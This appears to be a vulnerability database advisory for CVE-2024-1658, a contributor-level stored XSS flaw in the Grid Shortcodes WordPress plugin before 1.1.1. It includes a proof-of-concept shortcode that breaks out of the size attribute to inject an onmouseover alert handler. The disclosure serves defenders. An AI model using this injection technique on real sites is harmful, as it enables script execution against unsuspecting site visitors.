Lucene search
Dmitrii IgnatyevWPEX-ID:9489925E-5A47-4608-90A2-0139C5E1C43CHistoryFeb 26, 2024 - 12:00 a.m.
Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-02-2600:00:00
Dmitrii Ignatyev
37
grid shortcodes code injection vulnerability
contributor+ stored xss
grid shortcodes exploit
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[GDC_row]
[GDC_column size='" onmouseover="alert(1123123)"']
Your content here
[/GDC_column]
[GDC_column size="third"]
Your content here
[/GDC_column]
[GDC_column size="third"]
Your content here
[/GDC_column]
[/GDC_row]Related
wpvulndb
wpvulndb
Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-02-26 00:00:00
cvelist
cvelist
CVE-2024-1658 Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-03-18 15:15:26
vulnrichment
vulnrichment
CVE-2024-1658 Grid Shortcodes < 1.1.1 - Contributor+ Stored XSS
2024-03-18 15:15:26
cve
cve
CVE-2024-1658
2024-03-18 16:15:07
nvd
nvd
CVE-2024-1658
2024-03-18 16:15:07
AI Score
5.9
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:9489925E-5A47-4608-90A2-0139C5E1C43C